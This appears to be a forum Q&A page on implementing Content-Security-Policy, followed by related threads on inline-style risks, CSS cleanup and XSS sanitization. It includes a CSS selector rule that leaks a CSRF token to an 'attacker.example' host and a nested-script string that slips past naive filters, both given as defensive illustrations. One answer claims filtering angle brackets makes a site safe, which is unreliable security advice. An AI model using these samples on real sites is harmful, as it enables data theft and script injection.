Implementing CSP in an existing system containing third-party libraries - css

I've learned a bit about Content-Security-Policy, though not fully (which is why I'm here), and now I want to implement CSP in a rather old existing project.
The problem is, many files have multiple inline JavaScript/CSS blocks, both ones I've created myself and some from third-party libraries...
What is the best way to take care of these inlines, if any? There are plenty of files, and I don't want to go through all of them and adjust each one (if that's even possible), especially not the third-party files.
From what I've understood, the 'self' source keyword authorizes linked JavaScript files from the same origin. But some of the linked third-party libraries in the project contain inline CSS, or run code like innerHTML += someMarkupCode;, which in turn gives
"Refused to apply inline style because it violates the following Content Security Policy directive:" in the browser.
I've also read that you can use a hash or nonce for inlines. The problem is that some third-party files seem to be dynamic (like the example above), so I guess hashing cannot be used for those?
I've been looking into nonces, but it seems they're not supported by IE? I'm not sure how a nonce could be used with third-party libraries either.
But I guess for static pages a hash or nonce could be used...
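For reference, my rough understanding of what the two mechanisms look like (the nonce value and hash are illustrative placeholders, not real values):

<!-- nonce: the server generates a fresh random value per response and
     echoes it in both the header and each inline block it wants to allow -->
Content-Security-Policy: script-src 'self' 'nonce-rAnd0m123'
<script nonce="rAnd0m123">initWidget();</script>

<!-- hash: the header whitelists the SHA-256 of the exact inline content,
     so it only works when the inline block never changes -->
Content-Security-Policy: style-src 'self' 'sha256-<base64 of the exact style block>'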
I don't want to use the 'unsafe-inline' directive.
Have I missed anything obvious?
TL;DR:
What is the best way to manage third party libraries containing inlines when implementing CSP?

Related

CSP style-src: 'unsafe-inline' - is it worth it?

Currently I'm using Modernizr on all my sites, and it turns out that because of how it works it requires 'unsafe-inline' styles to be allowed. I already disallow inline scripts and 'unsafe-eval' for scripts. Curious as to what security risks there are in allowing inline styles?
Allowing inline styles makes you susceptible to the "other XSS": Cross-Site Styling attacks.
The idea here is that anywhere a user can inject a style attribute into your document, they can modify the appearance of your page any way they want. I'll list a couple of potential attacks, ordered by increasing severity:
They could turn your page pink, and make it look silly.
They could modify the text of your page, making it look like you're saying something offensive that could alienate your audience.
They could make user-generated content, like a link they provided, appear outside of the normal places where people expect to see user content, making it appear official (e.g., replacing a "Login" button on your site with their own link).
Using carefully crafted style rules, they could send information included on the page to external domains and expose or otherwise use that data maliciously against your users.
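To make that fourth item concrete, here is a sketch of selector-based exfiltration; the input name and attacker endpoint are hypothetical:

/* if the token value starts with "a", the browser fetches the attacker's
   URL, leaking that fact; repeating this per prefix reads the value out */
input[name="csrf-token"][value^="a"] {
  background-image: url("https://attacker.example/leak?prefix=a");
}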
The fourth example, with information being leaked to external domains, can be entirely prevented in spite of 'unsafe-inline', provided you ensure your other CSP rules never allow any kind of request to go to an untrusted or wildcard domain. But the first three will always be possible if you miss blocking a style attribute somewhere.
Mike West gave a good talk on this at CSSConf a few years back, with some more examples.
Personally, I find not using 'unsafe-inline' for CSS impractical. It means I have to use an external style sheet for EVERY style: coloring text, centering text, etc. It can be done; you can use a main style sheet ("main.css") plus a style sheet per page ("index.css", "contact.css", etc.). However, I am not so careless as to allow arbitrary code execution; I filter out all less-than and greater-than signs. I find this an unreasonable restriction. Blocking inline JavaScript is not as bad as blocking inline CSS, and I can see the case for blocking inline JavaScript, but I don't think I will do that either. If you are careful to filter your less-than and greater-than signs (there are a few other careless things you can do besides not filtering those), and you don't make mistakes that allow arbitrary code execution, then you are safe. These inline blocks are only there to protect web developers who screw up their code in a way that allows arbitrary code execution, but the blocks make it a bit harder to code. So it's a trade-off.
TL;DR: IMHO blocking inline CSS is not worth it; blocking inline JavaScript is worthwhile but unnecessary if you're careful. I will NOT be blocking inline CSS, and I'm not going to block inline JavaScript either, though I might consider it.
Experience: I am a web designer who designs in code using HTML, CSS, JavaScript, and PHP. I have my own website that I coded by hand, and I validate with the official W3C validator. I keep up with web design standards like HTML5.

How can I identify unused CSS classes?

Our development team recently took on the task of refactoring our enormous CSS file so that it will be more manageable in the future. I came up with a small list of subtasks, one of which is:
Remove the styles that aren't in use.
The problem is, I don't know how to identify which styles are being used. Some styles don't appear to be referenced anywhere in our code, such as those found in third-party controls. A solution-wide search does not find these third-party styles (like the default styles that come with Telerik controls). We appear to have overridden some of these third-party styles.
Short of deleting stuff and then checking every page to make sure that it looks identical, I do not know what to do. Is there a solid method for determining when a CSS class is in use?
In addition to the other online services, for local or privately stored projects you might find Helium.js useful.
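For a quick first pass you can also probe a live page from the browser console. Here's a minimal sketch; note it only sees the current state of the current page, so dynamically added classes and selectors used on other pages will show up as false positives:

// collect selectors from same-origin stylesheets that match nothing on this page
const unused = [];
for (const sheet of document.styleSheets) {
  let rules;
  try { rules = sheet.cssRules; } catch (e) { continue; } // cross-origin sheets throw
  for (const rule of rules) {
    if (!(rule instanceof CSSStyleRule)) continue;
    try {
      if (!document.querySelector(rule.selectorText)) unused.push(rule.selectorText);
    } catch (e) { /* skip selectors querySelector can't evaluate */ }
  }
}
console.log(unused);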

Best practices for identifiers/classes names in browser extensions

In extensions (I'm particularly focused on Chrome extensions), CSS identifiers and classes injected into a page may conflict with other elements on the page.
I'm trying to define their names with an extension prefix, but that's not perfectly safe. So, is there a way to define the names of CSS ids/classes securely?
It's not possible if "perfectly sure" is your requirement. Someone could always download your extension, look at the classnames you're using, then change their website's CSS to conflict with (or more likely attempt to override) your classnames. This is a feature, not a bug; extensions extend web pages, so they're supposed to be able to commingle with and alter their DOMs.
If you wanted to invent a system where others would not unintentionally conflict with yours, why not use the Java namespace scheme: take a domain you own and use it as a prefix, like com-example-myclassname? Slightly less readable, and no more secure, would be either the ID of your extension or a randomly generated SHA-1 hex-encoded hash:
abcdefghijklmnop-myclassname
da39a3ee5e6b4b0d3255bfef95601890afd80709-myclassname
I'm intentionally not including dynamic solutions here because CSS typically isn't dynamic in a Chrome extension or app. Moreover, CSP would probably make this approach anything but straightforward (which is a good thing).
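For what it's worth, the prefixing convention above amounts to a small helper in code; a sketch with illustrative names:

// build namespaced class names from a domain-based prefix
const PREFIX = 'com-example-myextension';
const cls = (name) => `${PREFIX}-${name}`;

// usage when injecting elements into the host page
const panel = document.createElement('div');
panel.classList.add(cls('panel'), cls('panel-visible'));
document.body.appendChild(panel);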

Rewriting binary links to use CDN

CDN integration seems to be a hot topic among the Tridion crowd. But somehow the available discussions mainly revolve around pushing content to/from the CDN. What I'm specifically interested in is:
What would be the proper way of modifying/prefixing the outbound links of inline images to use the CDN?
The simplest way to go would be to create some post-processing TBB, operating on the Output item, and place it inside the 'Default Finish Actions'. Though doing this on the CD side would seem more correct, wouldn't it?
EDIT
Consider a fancier case: what if I want not only to modify image paths but to wrap whole image links into ASP.NET controls? Where do I do this?
EDIT 2
So far, I've implemented tag-to-ASP.NET-control replacement via a TBB. It went smoothly; I only needed to keep an eye on the following subtle matters:
Consider CSS inline styles too (e.g. background-image: url(...))
The new TBB needs to be placed after any link-manipulating logic (e.g. Extract Binaries from Html, Publish Binaries in Package, Link Resolver)
The quickest and most robust implementation is probably simple string replacements, as opposed to regexes or XML parsing (see the sketch after this list)
To keep the standard "Preview" logic intact, some condition is necessary to trigger the logic
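For illustration only, the string-replacement idea boils down to something like this (shown as plain JavaScript rather than TBB C#; the /images/ path convention and the CDN host parameter are assumptions):

// naively prefix site-relative image references with the CDN host,
// covering both src attributes and CSS url(...) inline styles
function rewriteToCdn(output, cdnHost) {
  return output
    .split('src="/images/').join('src="' + cdnHost + '/images/')
    .split('url(/images/').join('url(' + cdnHost + '/images/');
}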
If you decide to go with ASP.NET controls for your CDN-hosted images, you may consider these phases/steps:
write a TCDL tag (e.g. <tcdl:image id="..." path="..." />) on the CM side during rendering
write a TCDL TagHandler implementation that transforms the TCDL into an ASP.NET include during deployment
write the ASCX control to do the CDN lookup proper when the visitor requests the page
I'm not sure if both step 2 and 3 are needed. You might also simply write the CDN path during the deployment phase (step 2 above).
At the same time I'd expect you to upload (updated) images to the CDN using a deployer extension, so that it also happens during phase 2.

Best practice for preventing saving malicious client script in HTML

We have an ASP.NET custom control that lets users enter HTML (similar to a rich text box). We noticed that a user can potentially inject malicious client scripts within a <script> tag in the HTML view. I can validate the HTML on save to ensure that I remove any <script> elements.
Is this all I need to do? Are all tags other than <script> safe? If you were an attacker, what else would you attempt?
Any best practices I need to follow?
EDIT: How is the MS Anti-XSS library different from the native HtmlEncode for my purposes?
XSS (Cross-Site Scripting) is a big and difficult subject to tackle correctly.
Instead of blacklisting some tags (and missing some of the ways you may be attacked), it is better to decide on a set of tags that are OK for your site and allow only those.
This in itself will not be enough, as you will have to catch all the possible encodings an attacker might try, and there are other things an attacker might attempt. There are anti-XSS libraries that help - here is one from Microsoft.
For more information and guidance, see this OWASP article.
Have a look at this page: http://ha.ckers.org/xss.html to get an idea of the different XSS attacks somebody may try.
There's a whole lot to do when it comes to filtering out JavaScript from HTML. Here's a short list of some of the bigger points:
Multiple passes over the input are required to make sure that what you removed earlier doesn't create a new injection. If you're doing a single pass, things like <scr<script></script>ipt>alert("XSS!");</scr<script></script>ipt> will get past you, since after you remove the <script> tags from the string, you'll have created a new one.
Strip the use of the javascript: protocol in href and src attributes.
Strip embedded event handler attributes like onmouseover/out, onclick, onkeypress, etc.
Whitelists are safer than blacklists. Only allow tags and attributes that you know are safe.
Make sure you're dealing with a single, consistent character encoding. If you treat the input as ASCII (single-byte) and it contains Unicode (multi-byte) characters, you're in for a nasty surprise.
Here's a more complete cheat sheet. Also, Oli linked to a good article at ha.ckers.org with samples to test your filtration.
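To illustrate the whitelist idea, here is a minimal sketch in browser JavaScript; the tag and attribute lists are illustrative, and in practice a vetted sanitizing library is the safer choice. Because it works on a parsed DOM rather than the raw string, it also sidesteps the re-splicing problem from the first bullet:

function sanitizeHtml(dirty) {
  const ALLOWED_TAGS = new Set(['B', 'I', 'EM', 'STRONG', 'P', 'A', 'UL', 'OL', 'LI', 'BR']);
  const ALLOWED_ATTRS = new Set(['href']);
  // parsing with DOMParser does not execute scripts
  const doc = new DOMParser().parseFromString(dirty, 'text/html');
  for (const el of Array.from(doc.body.querySelectorAll('*'))) {
    if (!ALLOWED_TAGS.has(el.tagName)) {
      el.replaceWith(...el.childNodes); // drop the tag but keep its children
      continue;
    }
    for (const attr of Array.from(el.attributes)) {
      // strip event handlers, javascript: URLs, and anything not whitelisted
      // (a real implementation should parse URLs rather than pattern-match)
      if (!ALLOWED_ATTRS.has(attr.name.toLowerCase()) || /^\s*javascript:/i.test(attr.value)) {
        el.removeAttribute(attr.name);
      }
    }
  }
  return doc.body.innerHTML;
}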
Removing only the <script> tags will not be sufficient, as there are lots of methods for encoding or hiding them in input. Most languages now have anti-XSS and anti-CSRF libraries and functions for filtering input. You should use one of these generally accepted libraries to filter your user input.
I'm not sure what the best options are in ASP.NET, but this might shed some light:
http://msdn.microsoft.com/en-us/library/ms998274.aspx
This is called a Cross-Site Scripting (XSS) attack. These can be very hard to prevent, as there are a lot of surprising ways to get JavaScript code to execute (javascript: URLs, sometimes CSS, object and iframe tags, etc.).
The best approach is to whitelist tags, attributes, and types of URLs (keeping the whitelist as small as possible for what you need) instead of blacklisting. That means you only allow certain tags that you know are safe, rather than banning tags you believe to be dangerous. This way there are fewer possible ways for someone to get an attack into your system, because tags you didn't think about won't be allowed, whereas with a blacklist, if you miss something, you still have a vulnerability. Here's an example of a whitelist approach to sanitization.
